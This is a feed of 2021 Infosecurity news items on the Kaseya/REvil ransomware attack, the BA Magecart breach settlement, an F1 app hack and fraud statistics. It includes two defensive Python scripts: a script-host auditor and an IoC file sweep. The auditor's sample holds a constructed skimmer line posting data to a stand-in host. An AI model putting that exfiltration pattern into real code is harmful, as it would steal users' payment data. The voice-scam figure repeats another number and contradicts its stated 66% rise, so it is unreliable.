Cyber Risk News

US: We May Take Unilateral Action Against Russian Cyber-Criminals

Info Security - Wed, 07/07/2021 - 08:20

The White House has issued another strongly worded warning to the Putin administration: the US will take action against cyber-criminals living in Russia if the Kremlin doesn’t.

Press secretary Jen Psaki explained that the two countries are continuing “expert-level” talks in the wake of the meeting between Presidents Biden and Putin last month. Another talk focused on ransomware is scheduled for next week.

“I will just reiterate a message that these officials are sending,” she added. “As the President made clear to President Putin when they met, if the Russian government cannot or will not take action against criminal actors residing in Russia, we will take action or reserve the right to take action on our own.”

The news comes in the wake of a major new supply chain attack on US software provider Kaseya, which has affected around 1,500 downstream organizations via their managed service providers (MSPs).

The attackers are said to have used the REvil/Sodinokibi variant, whose authors purportedly speak Russian, not least because the malware is coded not to infect any organizations residing in former Soviet countries.

However, given the large number of global affiliate groups using ransomware today, it’s far from clear whether this attack was launched by a Russian gang, even if the malware can be traced back there.

Psaki acknowledged this in the press briefing.

“The intelligence community has not yet attributed the attack. The cybersecurity community agrees that REvil operates out of Russia with affiliates around the world, so we will continue to allow that assessment to continue,” she said.

“But in our conversations — and we have been in touch directly — we are continuing to convey that message clearly.”

Biden revealed on Saturday that he had ordered the intelligence community to provide a “deep dive” on precisely what happened.

In the meantime, the official advice for any affected organizations continues to be to shut down any VSA servers and follow the mitigation steps from the Cybersecurity and Infrastructure Security Agency (CISA) issued over the weekend.

In related news, Kaseya explained in an update yesterday that its planned restoration of the VSA SaaS service had been delayed.

“During the VSA SaaS deployment, an issue was discovered that has blocked the release. Unfortunately, the VSA SaaS rollout will not be completed in the previously communicated timeline,” it noted.

“We apologize for the delay and R&D and operations are continuing to work around the clock to resolve this issue and restore service.”

Categories: Cyber Risk News

Hacker’s Mom Puts End to 10-Month Cyber-bullying Campaign

Info Security - Tue, 07/06/2021 - 18:49

A cyber-bullying campaign waged against a sixth grader from North Carolina for nearly a year appears to have been curtailed following its discovery by the abuser's mom.

For ten months, 12-year-old Wilson resident Jaylen White was on the receiving end of abuse so severe that he changed schools in a fruitless attempt to escape it and began having suicidal thoughts. 

The cyber-bullying was reported by White and his mother, Sheleen White, to school officials at Wilson Prep when it began disrupting White's remote learning. 

After the school failed to solve the problem, White was enrolled at Elm City Middle School, where he switched to strictly offline learning. 

“They (the school) deleted his account, and we went to paper packets all year,” said Sheleen White. 

White's mother reported the online abuse to her internet provider and to law enforcement officials, but the cyber-bullying campaign continued, with the perpetrator hacking into White's PlayStation account and ruining his games. 

Intimidating messages left by the cyber-bully would flash up on the screen while the Whites were watching movies on Netflix. 

One such message read: "I will stop if you kill yourself I promise." 

White's tormentor sent other messages stating that he knew where his victim was living. 

The Whites were also targeted with frequent fake 911 calls known as swatting attacks that brought emergency services to their home. Law enforcement agencies told the Whites that they did not possess the necessary equipment to be able to trace the calls. 

White became so distraught by the cyber-bullying that he considered taking his own life. 

“I remember him crying and saying, ‘Mom, if I just do it, maybe they’ll leave us alone,’” Sheleen White told CBS17 News.

“My child is being broken down to the point he is ready to leave the earth because someone is bothering him."

Last week, two new messages seemingly from the cyber-bully, appeared while the Whites were watching Netflix. 

"I won't hack you anymore. My mom caught me hacking you," read the first message, while the second one said, "She told me to apologize. I'm sorry for hacking you. Imma [sic] gonna disconnect from your stuff."

Since the messages were sent, the cyber-bullying has stopped. Sheleen said she wants to see whoever was behind the bullying caught and punished. 

Categories: Cyber Risk News

Official Formula 1 App Hacked

Info Security - Tue, 07/06/2021 - 18:34

Fans of Formula One International auto racing were sent strange messages over the holiday weekend after the sport's official app was hacked.

Forbes reports that the messages received by users of the F1 app over the July Fourth weekend are believed to be linked to a targeted cyber-attack. 

A spokesperson for F1 stated that no customer data is believed to have been compromised during the incident.

Two push notifications were sent out, the first of which, delivered at around 8pm CEST on Saturday, only contained the message "foo." Programmers have been known to use the metasyntactic variable "foo" as a placeholder for a value that can change, depending on conditions or on information passed to the program.

App users were then sent a less cryptic but more worrying message that read “Hmmmm, I should check my security.. :)”

The unsettling incident, which prompted F1 to launch an investigation, appeared to end there. 

Speaking to ESPN, an F1 spokesperson said that the probe into the incident “confirms that this targeted attack was limited to the Push Notifications Service.”

The spokesperson went on to say that F1 will “continue to investigate, review and improve safety measures but, at this time, have no reason to believe that any customer data has been accessed during this incident.”

The hack raised some concern among the app's users. One user, Jonathan Koziel, left a two-star review for the app on July 3 along with the statement: "This review isn't of the app itself, its [sic] honestly great and it works beautifully though the ads can be annoying. Anyways, [sic] I want to raise a security concern. 

"A couple mins before writing this I got a notification that said "Hmmm, you should check your security.. :)" If anyone can get back to me I would greatly appreciate it."

"While this hack may only have resulted in a mischievous message being sent to users, it certainly had the potential to be much worse," commented Emsisoft's Brett Callow.

"In-app messages could, for example, be used to create very convincing phishing campaigns. If a message were well-crafted, users would have little reason to question it. The moral here is really that folks should be suspicious about everything."

Earlier this year, an augmented reality app operated by the Williams F1 team was disrupted due to a cybersecurity incident. 

The team had intended to reveal its 2021 challenger, the FW43B, via the app on March 5, but removed the app from online stores after it was hacked.

Categories: Cyber Risk News

BA Settles with Data Breach Victims

Info Security - Tue, 07/06/2021 - 17:00

Compensation is to be paid to thousands of victims of a large-scale data breach at British Airways (BA). 

A legal claim was filed against the airline over a security incident that began in June 2018. Data belonging to around 420,000 people was compromised in a cyber-attack that went undetected for more than two months.

Between June 22 and September 5, 2018, a malicious actor gained access to an internal BA application through the use of compromised credentials for a Citrix remote access gateway.

The breach impacted personal data belonging to British Airways staff and to its customers in the United Kingdom, in the EU, and in the rest of the world. Magecart, a form of digital skimming code, was used by the attacker to collect and steal payment card information, names, and addresses.

An investigation by the Information Commissioner's Office (ICO) found the security measures put in place by British Airways to protect the vast quantities of personal data being processed were inadequate. 

In a penalty notice issued to BA in October 2020, the ICO stated: "After gaining access to the wider network, the attacker traversed across the network. This culminated in the editing of a JavaScript file on BA's website (www.britishairways.com). 

The edits made by the attacker were designed to enable the exfiltration of cardholder data from the 'britishairways.com' website to an external third-party domain (www.BAways.com) which was controlled by the attacker."
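The ICO's description above is the classic digital-skimming pattern: a first-party script is edited so that it also sends data to a host the site never intended to talk to. One defensive check is to audit the JavaScript you actually serve for destinations that are not on an allowlist. The script below is an added example written for this article; it is not BA's, the ICO's or any vendor's tooling, and the airline domain, the skimmer domain and the two sample scripts are constructed for illustration.

```python
"""Audit a site's JavaScript for outbound destinations that are not on an allowlist.

Added example for the BA/Magecart skimming described above. It is not BA's, the ICO's
or any vendor's tooling; the sample scripts, the airline domain and the skimmer domain
below are constructed for illustration.
"""
import re
from urllib.parse import urlparse

# Absolute http(s) URLs and protocol-relative "//host/..." URLs inside string literals.
URL_RE = re.compile(r"""["'`](?P<url>(?:https?:)?//[^"'`\s]+)["'`]""")
# Constructs that typically carry data off the page; used to rank findings, not to prove exfiltration.
SENDER_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|\$\.ajax|\$\.post)\b|\.src\s*=")

# Hosts a first-party script is expected to talk to (constructed). A bare domain also allows its sub-domains.
ALLOWED_HOSTS = {"example-airline.test", "www.example-airline.test", "static.example-airline.test"}

# Constructed scripts: an untouched checkout script and a library file edited to post form data elsewhere.
SAMPLE_SCRIPTS = {
    "checkout.js": (
        'var cfg = {api: "https://www.example-airline.test/api/pay"};\n'
        'fetch(cfg.api, {method: "POST", body: form});'
    ),
    "vendor-lib.js": (
        '/* ... original library code ... */\n'
        'fetch("https://www.example-skimmer.invalid/collect", {method: "POST", body: payload});'
    ),
}


def extract_hosts(js_source):
    """Return the set of hostnames referenced by URL literals in a script."""
    hosts = set()
    for match in URL_RE.finditer(js_source):
        url = match.group("url")
        if url.startswith("//"):
            url = "https:" + url
        host = urlparse(url).hostname  # already lower-cased by urlparse
        if host:
            hosts.add(host)
    return hosts


def audit_script(name, js_source, allowed_hosts):
    """One finding per referenced host that is neither allowed nor a sub-domain of an allowed host."""
    allowed = {h.lower() for h in allowed_hosts}
    sends_data = bool(SENDER_RE.search(js_source))
    findings = []
    for host in sorted(extract_hosts(js_source)):
        if host in allowed or any(host.endswith("." + a) for a in allowed):
            continue
        findings.append({"script": name, "host": host, "sends_data": sends_data})
    return findings


def audit_site(scripts, allowed_hosts):
    """Audit every script (name -> source); scripts that can send data are listed first."""
    findings = []
    for name, source in scripts.items():
        findings.extend(audit_script(name, source, allowed_hosts))
    return sorted(findings, key=lambda f: (not f["sends_data"], f["script"], f["host"]))


if __name__ == "__main__":
    for finding in audit_site(SAMPLE_SCRIPTS, ALLOWED_HOSTS):
        flag = "SENDS DATA" if finding["sends_data"] else "reference only"
        print(f"{finding['script']}: unexpected host {finding['host']} ({flag})")
```

Run against the scripts a build actually ships (or fetched from the live site and diffed against the build), the check reports the tampered library file and its unexpected host while the genuine checkout script passes. It is a cheap complement to a Content Security Policy and Subresource Integrity, which stop the browser from loading or contacting unexpected hosts in the first place; a skimmer that obfuscates the destination string would evade the literal-URL regex, which is why the sender pattern is reported alongside it.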

BA, which is a subsidiary of International Airlines Group, was initially slapped with a record-breaking fine of £183m by the ICO for violating GDPR. The fine was later reduced to £20m.

While settling the legal claim brought by some of the data breach victims, British Airways did not admit any liability. 

The airline has kept the terms of the settlement under wraps, so it is unclear how much each plaintiff will receive.

BA said it was "pleased we've been able to settle the group action."

Earlier this year, the compensation claim against British Airways was described by a law firm as "the largest group-action personal-data claim in UK history," involving more than 16,000 victims. 

Categories: Cyber Risk News

Industry Must Drive Forward International Collaboration on Cyber

Info Security - Tue, 07/06/2021 - 15:15

The cybersecurity industry needs to push forward global collaborative efforts to combat cyber-threats. This was the message from a panel discussion during the UK Cyber Security Association’s One Day Summit Event.

Governments need to play a major role in facilitating alignment in this area. Still, the panelists believe the industry associations, who operate in and fully appreciate the increasingly dangerous cyber-threat landscape, must take the initiative for real progress to begin.

Professor Lisa Short, director & co-founder of P&L Digital, emphasized that the digital world is borderless, and “the attacks we’re seeing have a global impact.” Despite this, countries are largely still operating in silos regarding cybersecurity, favoring a “nationalistic approach.” She added that as of yet, there hadn’t been a significant global event focused on cybersecurity among major world leaders. “We haven’t seen the 193 nations of the UN, the G7 or the G20 get up with industry experts and have a discussion on what can be done at a global level.”

Chris Windley, co-director of UK Cyber Security Association, noted that while there is much more governments can do to foster collaboration, “we can’t really wait for them, we have to act right now and communicate globally and cooperate.” He believes it requires the leadership and insights of industry organizations like the UK Cyber Security Association and the Cybersecurity Global Alliance to force change.

Short concurred, stating that government machinery is traditionally slow, and left to its own devices, cannot keep up with fast-moving and agile cyber-threat actors. Additionally, she said that most decision-makers do not have the technical knowledge required to enact the proper steps in this space. “Unless they start to have collaborative discussions with industry organizations, who’ve got very deep networks with a multidisciplinary approach, then they won’t address the challenges at the pace of change that we require,” she commented.

A critical aspect of this approach is for the industry to educate governments on just how serious a problem cyber-threats are and the potentially catastrophic impact they may have. James Castle, founder of Global Cyber Security Alliance, said governments “need to start treating this thing as an act of terrorism,” adding that “once we have achieved that then the government will be able to start working with organizations.”

Once governments are working more closely with industry and treating cyber-threats with the seriousness they deserve, they can develop the necessary global infrastructure to foster collaboration. For example, Short advocated developing an international communication system, enabling intelligence to be rapidly passed between governments and organizations, in the same way as there are tsunami and terror warnings. “I don’t think there’s enough communication occurring when there’s intelligence known about potential movements in this space, potential attacks that have occurred and letting the rest of the world know in a much quicker way,” she outlined.

The cyber industry must be at the forefront of such an approach, according to Short. “We need to take this seriously and start to communicate and pass intelligence between organizations around the world.”

Bishakha Jain, senior cybersecurity consultant at IBM India, agreed that communication is key to global collaboration but cautioned that “there has to be a strategy in place.” To communicate effectively between different countries and organizations, “governments need to join hands with everyone to build it together.”

While there is a long way still to go in this space, Windley said that given the surge in high-profile cyber-attacks over the past year or so, we are seeing signs that governments are starting to take the issue more seriously. This includes measures recently introduced by US President Joe Biden in this area, such as an executive order mandating zero trust for all federal government software suppliers.

Categories: Cyber Risk News

Brits Lose Over £1bn in Fraud So Far This Year

Info Security - Tue, 07/06/2021 - 09:30

Brits have lost over £1bn to fraud and cybercrime in the first six months of 2021, according to money.co.uk’s latest Quarterly Fraud and Cyber Crime Report.

The analysis revealed that 81,018 fraud and cybercrime-related police reports were issued in Q2 2021, with UK residents experiencing a total loss of £382.3m due to these crimes. Interestingly, this represents a significant decrease compared with Q1 2021, when there were 137,695 reports. The personal finance advisory firm believes this decline is due to the easing of COVID-19 lockdown restrictions in Q2, as this reduced online activities.

However, financial losses per average victim were £176 higher in Q2 compared to Q1, at £4,719.

The most common type of fraud and cybercrime in Q2 was related to online shopping and auctions, comprising one in five police reports (14,868). Victims lost a total of £11.9m to these types of activities.

The number of reports fell by half compared to Q1, which could be due to the reopening of non-essential retail in Q2, thereby reducing the volume of e-commerce transactions. Average losses per victim were 29% higher in Q2 than Q1 (£800 vs. £618).

According to the report, crimes relating to financial investments, share sales, or boiler room fraud proved to be most costly to victims in Q2. A total of 1,309 victims lost £35.8m to these activities in this period, equating to £26,585 per person.

Dating scam victims also experienced heavy losses, at £13,558 each on average.

Breaking down the figures by age, Brits aged 30-39 were most commonly hit by fraud and cybercrime, making up 13,172 reports and a total of £37m lost.

Elderly UK residents (aged 70 and above) were more likely to fall victim to computer software and other advance fee frauds than any other age category. This population lost £34.2m to these crimes in Q2, with an average of £6,118 lost per case.

James Andrews, personal finance expert at money.co.uk, said: “Brits have lost more than £1bn as a result of fraudulent and cybercrimes, showing the extent fraudsters have taken advantage of online shoppers during the national lockdown.

“But it’s encouraging to see that cases have decreased significantly in the second quarter of the year, as life has started heading back towards normality. Still, with millions of pounds lost, it’s vital that individuals are aware of what they should be doing to protect themselves against fraudsters.”

Categories: Cyber Risk News

Japan Looks to Boost Military Cyber Experts Amid Security Threat

Info Security - Tue, 07/06/2021 - 09:07

The Japanese military is set to add hundreds of new cybersecurity specialists to its forces in the face of aggression from hostile nations, according to a new report.

Ministry of Defense plans seen by Nikkei revealed that there were 660 such personnel in the country’s Self Defense Forces (SDF) at the end of fiscal 2020. However, the plan is to increase this figure to 800 by the end of March 2022 and over 1,000 by the end of 2023.

A single unit will also be created to look after unified cybersecurity for all three branches of the Japanese military — land, sea and air — in a bid to boost efficiency.

Such expertise is sorely needed in the face of increasing hostility from Chinese and Russian state-backed hackers and organized cybercrime.

In May last year, the government revealed it was investigating a potentially serious breach of national security after prototype plans for a hypersonic missile may have been stolen from Mitsubishi Electric.

The firm was purportedly bidding for a contract for the next-generation military technology, which has plunged the US, Russia and China into yet another arms race.

Sensitive employee data was also taken from the industrial giant by state operatives, it was reported.

According to a recent report from the British think-tank the International Institute for Strategic Studies, Japan lies at the bottom of a global “cyber power” ranking.

Despite its reputation for innovation, the country struggles to match the Five Eyes nations due to constitutional constraints on data collection, the report claimed. It was assessed as Tier Three, the lowest of the three-grade scale.

Alongside the new cyber recruits to the SDF, Japan’s defense ministry is also hiring experts from outside companies like NTT and LAC to work as part-time advisors.

A new cybersecurity training course was recently introduced at the Ground Self-Defense Force’s engineering school, and another program may be set up in collaboration with NTT, according to the report.

Categories: Cyber Risk News

Suspected Cyber-Criminal "Dr Hex" Tracked Down Via Phishing Kit

Info Security - Tue, 07/06/2021 - 08:42

Security researchers have revealed how patient detective work enabled them to trace and identify a suspected prolific cyber-criminal, who was finally arrested in May.

A two-year investigation into the individual, who often went by the online moniker “Dr Hex,” ended when Interpol’s Operation Lyrebird swooped on the man in Morocco earlier this year.

Group-IB’s Threat Intelligence team claimed the individual was active since 2009 and allegedly responsible for phishing, defacing, malware development, fraud, and carding, resulting in thousands of unsuspecting victims. These included customers of French telecoms companies, banks and other multinationals.

The trail began when the threat intelligence team identified and deanonymized a phishing kit that was used to target a French bank. It found that almost every script used in the kit featured the name “Dr Hex” and an email address.

That email led them to a YouTube channel signed up under the same name, and in turn to an Arabic crowdfunding platform, which revealed another name associated with the individual. This name was apparently used to register two domains created using the email from the phishing kit.

“Using its patented graph network analysis technology, Group-IB researchers built a network graph, based on the email address from the phishing kit, that showed other elements of the threat actor’s malicious infrastructure employed by him in various campaigns along with his personal pages,” Group-IB said.

“A total of five email addresses associated with the accused were identified, along with six nicknames, and his accounts on Skype, Facebook, Instagram, and YouTube.”

Further analysis of this digital footprint revealed that from 2009 to 2018, the threat actor defaced over 130 web pages while also posting on underground platforms — indicating he was involved in malware development.

The research helped Interpol and Moroccan police finally track down the individual.

“This is a significant success against a suspect who is accused of targeting unsuspecting individuals and companies across multiple regions for years, and the case highlights the threat posed by cybercrime worldwide,” comments Interpol executive director of police services, Stephen Kavanagh.

“The arrest of this suspect is down to outstanding international investigative work and new ways of collaboration both with Moroccan police and our vital private sector partners such as Group-IB.”

Categories: Cyber Risk News

REvil Group Demands $70 Million for 'Universal Decryptor'

Info Security - Tue, 07/06/2021 - 08:19

The group behind the crippling supply chain ransomware attack on a US software company has reportedly demanded $70 million in return for a 'universal' decryption key, as researchers claim there could be thousands of global victims.

It’s believed that the REvil strain was used to compromise Kaseya’s VSA IT management software, although which ransomware affiliate is unknown.

However, as reported by the BBC, there has been surprise at the group’s request that the money be paid in Bitcoin, which is easier to trace than Monero.

In fact, individual ransom requests with affected organizations are apparently still being made in Monero, but the latest $70 million demand for a decryptor for all victims was issued in Bitcoin.

It’s unclear how many organizations are affected. The original estimate from Kaseya of “fewer than 40” was yesterday revised upwards to “fewer than 60.”

Many of these are managed service providers (MSPs) whose customers were affected. The software maker estimates around 1,500 downstream organizations of this sort were impacted — all of whom run its on-premises product.

Among these unlucky organizations are 500 Coop supermarkets in Sweden, 11 schools in New Zealand and two Dutch IT firms.

A report from Kaspersky yesterday claimed as many as 5,000 attack attempts had been made in 22 countries since July 2.

The attack's impact may have been exacerbated as it was timed to coincide with the July 4 holiday weekend in the US, meaning many IT security professionals were off duty.

However, the FBI and Cybersecurity and Infrastructure Security Agency (CISA) jointly released guidance for affected MSPs and their customers.

For the former, the advice included downloading Kaseya’s VSA Detection Tool, which is designed to scan systems for any indicators of compromise (IoCs).
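An IoC sweep of the kind the guidance describes comes down to walking a set of files and comparing each file's name and content hash against a published indicator list. The script below is an added example written for this article; it is not Kaseya's VSA Detection Tool, and the indicators in it are constructed placeholders (the hash of a constructed byte string and a made-up file name), not indicators from the incident. In practice the two dictionaries would be loaded from the vendor's or CISA's advisory.

```python
"""Minimal indicator-of-compromise (IoC) sweep over files.

Added example for the FBI/CISA advice above. It is not Kaseya's VSA Detection Tool and
the indicators below are constructed placeholders (the hash of constructed sample bytes
and a made-up file name), not IoCs from the incident; a real sweep loads them from the advisory.
"""
import hashlib
import os

# Constructed sample of "malicious" content, so the hash indicator below is reproducible.
SAMPLE_MALICIOUS_BYTES = b"constructed sample payload - not real malware"

# Constructed indicators: sha256 -> description, and lower-cased file name -> description.
IOC_SHA256 = {
    hashlib.sha256(SAMPLE_MALICIOUS_BYTES).hexdigest(): "constructed sample payload",
}
IOC_FILENAMES = {
    "placeholder-dropper.exe": "constructed file-name indicator",
}
MAX_FILE_BYTES = 64 * 1024 * 1024  # skip very large files rather than reading them into memory


def sha256_of(data):
    return hashlib.sha256(data).hexdigest()


def check_file(path, data, hash_iocs=IOC_SHA256, name_iocs=IOC_FILENAMES):
    """Return the IoC matches for one file: a file-name match and/or a content-hash match."""
    hits = []
    name = os.path.basename(path).lower()
    if name in name_iocs:
        hits.append({"path": path, "indicator": "filename", "detail": name_iocs[name]})
    digest = sha256_of(data)
    if digest in hash_iocs:
        hits.append({"path": path, "indicator": "sha256", "detail": hash_iocs[digest]})
    return hits


def scan_files(files, hash_iocs=IOC_SHA256, name_iocs=IOC_FILENAMES):
    """Scan an iterable of (path, bytes) pairs; keeps the matching logic testable without a filesystem."""
    hits = []
    for path, data in files:
        hits.extend(check_file(path, data, hash_iocs, name_iocs))
    return hits


def iter_directory(root):
    """Yield (path, bytes) for regular files under root, skipping unreadable and oversized ones."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for filename in filenames:
            path = os.path.join(dirpath, filename)
            try:
                if os.path.getsize(path) > MAX_FILE_BYTES:
                    continue
                with open(path, "rb") as fh:
                    yield path, fh.read()
            except OSError:
                continue


def scan_directory(root):
    """Sweep a directory tree and return every IoC match found."""
    return scan_files(iter_directory(root))


if __name__ == "__main__":
    import sys
    for hit in scan_directory(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{hit['path']}: {hit['indicator']} match ({hit['detail']})")
```

A hash match is strong evidence and a file-name match is weak evidence (legitimate files can share a name), so the two are reported separately rather than folded into one verdict. Hash-only sweeps also miss variants the attacker has recompiled, which is why a vendor tool is normally paired with the behavioural indicators in the advisory rather than relied on alone.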

Christos Betsios, cyber operations officer at Obrela, pointed out that REvil predecessor GandCrab compromised Kaseya in the past to infect MSPs and their customers.

“The key is always to be prepared for the worst-case scenario, even if proper patch management and vulnerability management programs are in place, we are not secure anymore,” he added. “Attackers will continue to try to compromise big software vendors and distribute their malicious code via them.”

Categories: Cyber Risk News

Attacks on UK Firms Fall for First Time in Three Years

Info Security - Mon, 07/05/2021 - 10:08

Recorded cyber-attacks against UK businesses have fallen for the first time since 2018, although hybrid working practices represent an ongoing risk, according to new data from Beaming.

The business ISP has been analyzing malicious traffic targeting its customers since 2016, in order to better understand the threat landscape.

It claimed that threat volumes dropped by 9% year-on-year in the second quarter of 2021, bringing them down to levels similar to Q1 2021 when businesses suffered just over 157,000 attacks each on average.

However, businesses should not let their guard down: Beaming customers were each hit by an average of 160,610 attempts to breach their systems in Q2 2021, which amounts to an attack every 49 seconds.

Although these will largely be low-level, automated threats, there’s still the potential to cause damage if defenses aren’t configured correctly — especially as organizations adapt to a new hybrid way of working.

Beaming managing director, Sonia Blizzard, explained that a surge in cyber-attacks early last year coincided with the first lockdown, indicating threat actor efforts to exploit under-protected home workers.

“Attacks have fallen to near pre-pandemic levels as more people returned to their workplaces, but businesses are still in the firing line and face new attacks every minute. We continue to urge caution,” she warned.

“Home and hybrid working remains a permanent fixture for lots of firms. Many of their people will access company data and IT systems via personal devices and unmanaged domestic internet connections. These new normal working practices are inherently insecure and increase the risk of a breach.”

Blizzard urged businesses that allow home working to revisit their security strategy in order to minimize cyber risk.

Phishing emails designed to trick distracted home workers, exploits for unpatched software including VPNs, and hijacking of RDP endpoints protected by weak or breached passwords have been common tactics used to target remote working staff over the past year.

Most attacks from Q2 2021 were traced back to computers in China, followed by the US, India and Russia, Beaming said.

Categories: Cyber Risk News

US the Only Top Tier Cyber-power

Info Security - Mon, 06/28/2021 - 18:39

The United States of America stands alone as the only "top tier" cyber-power nation, according to a new research paper by the International Institute for Strategic Studies (IISS).

The London-based think tank assessed the cyber-prowess of 15 countries around the world for two years before ranking them into tiers according to their global state cyber-capacity. 

To gauge the cyber-power of each country, IISS examined a range of cyber capabilities, including the strength of the digital economy, core cyber-intelligence capability, cybersecurity and resilience, security functions, maturity of intelligence, and integration of cyber facilities with military operations.

The United States, despite falling victim to a swathe of cyber-attacks including recent assaults on the Colonial Pipeline and meat processor JBS, was the only country deemed advanced enough to occupy the top tier. 

"Since the late 1990s the US has moved more decisively than any other country to defend its critical information infrastructure in cyberspace, but it also recognizes that the task is extremely difficult and that major weaknesses remain," noted IISS.

Researchers found that the offensive cyber capabilities of the United States "are more developed than those of any other country," but also noted that "these capabilities have not yet been demonstrated at their full potential."

In the second tier are the United Kingdom, Australia, and Canada, which together with the US and New Zealand make up the members of the Five Eyes (FVEY) intelligence alliance. 

Also in tier two are Russia, France, and the People's Republic of China. Occupying the third tier are India, Japan, Malaysia, North Korea, Iran, and Vietnam.

The report concluded that China, which boasts the world's second largest economy after the United States, suffers from poor security and weak intelligence analysis when it comes to cyber-power. 

IISS predicts that it will be another ten years at least before the PRC is able to give cyber-powerhouse United States a run for its money. 

The Institute found that while Russia and China have successfully carried out sophisticated cyber-offensives, both countries had holes in their cybersecurity that put them at a disadvantage compared to the countries in tiers one and two.

Categories: Cyber Risk News

Zero-day Exploit Found in Adobe Experience Manager

Info Security - Mon, 06/28/2021 - 16:18

A zero-day vulnerability has been discovered in a popular content management solution used by high-profile companies including Deloitte, Dell and Microsoft.

The bug in Adobe Experience Manager (AEM) was detected by two members of Detectify’s ethical hacking community. If left unchecked, the weakness allows attackers to bypass authentication and gain access to CRX Package Manager, leaving applications open to remote code execution (RCE) attacks.

"With access to the CRX Package Manager, an attacker could upload a malicious package in Adobe Experience Manager to leverage it to an RCE and gain full control of the application," said a Detectify spokesperson.

Detectify Crowdsource members Ai Ho (@j3ssiejjj) and Bao Bui (@Jok3rDb) uncovered the vulnerability and named it AEM CRX Bypass. 

The pair found that several large organizations were affected by the bug, including Mastercard, LinkedIn, PlayStation and McAfee. 

The vulnerability occurs at CRX package endpoints and can be remediated by blocking public access to the CRX consoles.

A Detectify spokesperson explained: "The CRX Package Manager is accessed by bypassing authentication in Dispatcher, Adobe Experience Manager’s caching and/or load balancing tool. 

"Dispatcher checks a user’s access permissions for a page before delivering the cached page and is an essential part of most – if not all – AEM installations. It can be bypassed by adding a lot of special characters in combination in the request."

Security researcher Bao Bui is a former CTF player of the Meepwn CTF Team who started hunting bug bounties around a year ago. Security engineer and developer Ai Ho has been active on the bug bounty scene for two years, building his own bug-catching tools and sharing them on GitHub.  

The zero-day flaw was reported to Adobe, who swiftly released a patch for it. The AEM CRX Bypass zero-day was then implemented as a security test module on Detectify’s platform. 

"Since it went live in May 2021, around 30 instances of the AEM CRX Bypass vulnerability have been [found] in customers’ web applications," said a Detectify spokesperson.

Detectify's scans for more than 80 unique AEM vulnerabilities have generated over 160,000 hits in total so far. 

Categories: Cyber Risk News

Kentucky Healthcare System Exposes Patients’ PHI

Info Security - Mon, 06/28/2021 - 15:36

A healthcare system located in Kentucky is notifying more than 40,000 patients of an error that saw their personal health information (PHI) emailed to the wrong address. 

UofL Health, which is based in Louisville, consists of five hospitals, four medical centers, nearly 200 physician practice locations, more than 700 providers, the Frazier Rehab Institute and Brown Cancer Center.

Earlier this month, the system notified the Health and Human Services Office for Civil Rights of an email security incident involving the unauthorized disclosure of data belonging to 42,465 individuals. 

Patients’ PHI was put at risk when it was erroneously sent to an email address outside of the health system’s network. According to UofL, the accidental recipient of the data did not view or access any patient information.

The healthcare system, which employs more than 12,000 physicians, surgeons, nurses, pharmacists and other highly skilled health care professionals, did not state what data was contained within the email.

In a notice posted to its website, UofL Health stated: “On June 7, we sent some of our patients a letter explaining that we had recently discovered that some UofL Health emails containing some of their health information were sent to an external domain. We provided that notice based on our best knowledge as of that day."

The notice went on to say that the email had since been deleted and that the safety of the data had been investigated.

“The next day, on June 8, we received a response from the owner of the external domain, providing us with technical evidence that the emails we were concerned about were never viewed or accessed, and have been deleted," said UofL Health.

"We are relieved that our patients’ information is not at risk as a result of this incident, though we wish that information would have come to us sooner."

Patients whose data was impacted by the incident have been offered free identity protection services.

Earlier this year, Kentucky-based health plan provider Humana was affected by a data breach that impacted 62,950 plan members. Cotiviti, one of the company's subcontractors, inappropriately disclosed data to unapproved individuals for training purposes for three months from October 2020. 

Seamless EU-UK Data Flows to Continue Following Adequacy Decisions

Info Security - Mon, 06/28/2021 - 13:52

The European Union (EU) has formally granted the UK adequacy status, allowing the flow of personal data between the two regions to continue seamlessly.

Earlier today, it was announced that the EU adopted two adequacy decisions for the UK – one under the General Data Protection Regulation (GDPR) and the other for the Law Enforcement Directive. These acknowledge that UK data protection rules are “essentially equivalent” to EU standards in both areas.

The decisions by the EU Commission will be of significant relief to businesses operating in the two jurisdictions, as it means additional arrangements will not be needed to allow data to be transferred from the EU to the UK.

The announcement has been pending ever since the EU-UK Trade and Cooperation Agreement, which governs the UK and EU’s future trading relationship following the Brexit transition period, came into force on January 1, 2021.

The EU Commission first published draft decisions granting the UK adequacy status in the two areas back in February 2021. However, these had to be shared with the European Data Protection Board for a ‘non-binding opinion’ before being put to EU member states for formal approval. The board then gave its approval to these draft decisions in April but highlighted a number of areas that required further assessment, including “the role and powers of the security services.”

There were concerns the latter could prove to be a sticking point, especially as it formed the basis of the ‘Schrems II’ decision in June 2020 by the Court of Justice of the European Union, which invalidated the privacy shield between the EU and US. However, these fears have proven to be unfounded, with the Commission acknowledging that the UK’s system allows for solid safeguards regarding access to personal data by public authorities, notably for national security reasons.

The EU did emphasize that both adequacy decisions include safeguards if the UK diverges from its current arrangements in the future. These include a ‘sunset clause,’ limiting the duration of the adequacy to four years. 

Didier Reynders, EU Commissioner for Justice, commented: “After months of careful assessments, today we can give EU citizens certainty that their personal data will be protected when it is transferred to the UK. This is an essential component of our new relationship with the UK. It is important for smooth trade and the effective fight against crime. The Commission will be closely monitoring how the UK system evolves in the future, and we have reinforced our decisions to allow for this and for an intervention if needed. The EU has the highest standards when it comes to personal data protection, and these must not be compromised when personal data is transferred abroad.”

The UK Secretary of State for Digital, Oliver Dowden, welcomed the decisions, stating: “After more than a year of constructive talks it is right the European Union has formally recognized the UK’s high data protection standards.

“This will be welcome news to businesses, support continued cooperation between the UK and the EU, and help law enforcement authorities keep people safe.

“We will now focus on unlocking the power of data to drive innovation and boost the economy while making sure we protect people’s safety and privacy.”

Reported HMRC-Branded Phishing Scams Grew by 87% During COVID-19

Info Security - Mon, 06/28/2021 - 12:56

Suspected HMRC-branded phishing scams grew by 87% during the COVID-19 pandemic, according to official figures obtained by accountancy group Lanop Outsourcing following a Freedom of Information (FoI) request.

This data revealed that reports of phishing scams impersonating the UK’s tax, payments and customs authority surged from 572,029 in the financial year 2019-20 to 1,069,522 from April 2020 to April 2021.

Messages related to tax rebates or refunds made up the majority of reported scams, comprising 690,522 out of a total of 1,069,522 that were recorded in 2020-21. This compares to 636,118 in 2019-20. This increase is likely a result of cyber-criminals looking to exploit the number of financial relief packages introduced by the UK government during COVID-19.

There was also a substantial rise (66%) in suspected voice scam attacks in this period, from 203,362 reports in FY 2019-20 up to 690,522 in FY 2020-21.

